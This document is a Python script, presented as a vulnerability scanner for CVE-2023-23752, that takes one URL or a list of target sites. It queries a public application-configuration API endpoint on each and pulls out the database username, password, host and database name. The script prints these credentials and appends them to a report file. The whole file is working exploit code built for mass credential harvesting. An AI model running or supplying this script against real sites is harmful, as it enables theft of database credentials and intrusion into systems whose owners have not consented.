import requests
import re
import argparse
import os
from colorama import init, Fore, Style
# Switch colorama on. With autoreset=True the style is reset after every
# print, so a coloured result line never bleeds into the next one.
init(autoreset=True)

# Identifier of the issue this script checks for; it is interpolated into
# every status line and report entry below.
CVE_ID = 'CVE-2023-23752'

# Start-up banner. It is printed when the module is loaded, so it also
# appears when this file is imported rather than run as a script.
_BANNER = '''
###### ## ## ######## ####### ##### ####### ####### ####### ####### ######## ######## #######
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ###### ####### ####### ## ## ####### ####### ####### ####### ####### ## ####### #######
## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
###### ### ######## ######### ##### ######### ####### ######### ####### ## ###### #########
'''
print(_BANNER)
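def _printable(value):
    """Return *value* with every non-printable character replaced by '?'.

    The strings passed in are taken verbatim from the remote response. Left
    as they are, control characters in them (terminal escape sequences,
    line breaks) would be replayed on the operator's terminal or would add
    forged lines to the report file.
    """
    return "".join(ch if ch.isprintable() else "?" for ch in value)


def check_vulnerability(url, output_file=None, *, timeout=10):
    """Check one site for the configuration disclosure tracked as CVE_ID.

    The URL is normalised (scheme and API path added when missing), the
    application-config endpoint is requested, and the response body is
    searched for the ``user``, ``password``, ``host`` and ``db`` fields.
    The outcome is printed; a positive finding is also appended to
    *output_file* when one is given.

    Args:
        url: Site base URL, with or without scheme and API path.
        output_file: Optional path of a report file to append findings to.
        timeout: Seconds to wait for the server before giving up. Without
            a limit a single unresponsive host stalls a whole list run.

    Returns:
        None. Results are reported through stdout and the report file.
    """
    endpoint = "/api/index.php/v1/config/application?public=true"

    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    if not url.endswith(endpoint):
        # Drop a trailing slash first so "host/" does not become "host//api/...".
        url = url.rstrip("/") + endpoint

    try:
        response = requests.get(url, timeout=timeout)
    except requests.exceptions.RequestException:
        print(f"{Style.BRIGHT}{Fore.YELLOW}Error connecting to {url}")
        return

    if response.status_code != 200:
        print(f"{Style.BRIGHT}{Fore.YELLOW}Not vulnerable to {CVE_ID}: {url}")
        return

    # This is a pattern match on the raw body, not a JSON parse: a 200 that
    # lacks any one of the four fields is reported as not vulnerable.
    body = response.text
    found = {}
    for field in ("user", "password", "host", "db"):
        match = re.search(rf'"{field}"\s*:\s*"([^"]+)"', body)
        if match is None:
            print(f"{Style.BRIGHT}{Fore.GREEN}Not vulnerable to {CVE_ID}: {url}")
            return
        # Server-controlled text: neutralise control characters before it
        # reaches the terminal or the report.
        found[field] = _printable(match.group(1))

    print(f"{Style.BRIGHT}{Fore.RED}Vulnerable to {CVE_ID}: {url}")
    for field, value in found.items():
        print(f"\t{field}: {value}")

    if output_file:
        # The report holds live database credentials, so a newly created
        # file is made readable by its owner only. The mode applies at
        # creation time; an existing file keeps the permissions it has.
        fd = os.open(output_file, os.O_WRONLY | os.O_APPEND | os.O_CREAT, 0o600)
        with os.fdopen(fd, "a", encoding="utf-8") as report:
            report.write(f"Vulnerable to {CVE_ID}: {url}\n")
            for field, value in found.items():
                report.write(f"{field}: {value}\n")
            report.write("\n")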
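def main():
    """Parse the command line and check one URL or every URL listed in a file.

    Exactly one of ``-u/--url`` and ``-f/--file`` must be given. With
    ``-o/--output`` the findings are also appended to that file; a bare
    file name is resolved against the current working directory.
    """
    parser = argparse.ArgumentParser(description='Python vulnerability scanner')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-u', '--url', metavar='URL', type=str, help='URL to scan')
    group.add_argument('-f', '--file', metavar='FILE', type=str, help='File containing list of target URLs')
    parser.add_argument('-o', '--output', metavar='OUTPUT', type=str, help='Output file to store results')
    args = parser.parse_args()

    print(f"Scanning URLs for {CVE_ID} vulnerability...")

    if args.output:
        if not os.path.dirname(args.output):
            args.output = os.path.join(os.getcwd(), args.output)
        # Create the report if it is missing, without truncating one that
        # exists. It will hold recovered credentials, so a new file is
        # created owner-readable only; doing it in one os.open call also
        # avoids the exists-then-create race and the unclosed-handle idiom.
        os.close(os.open(args.output, os.O_WRONLY | os.O_CREAT, 0o600))

    if args.url:
        check_vulnerability(args.url, output_file=args.output)
    elif args.file:
        with open(args.file, 'r') as targets:
            for line in targets:
                url = line.strip()
                if not url:
                    # A blank line would otherwise be probed as "http://".
                    continue
                check_vulnerability(url, output_file=args.output)

    print("Scan complete.")


if __name__ == '__main__':
    main()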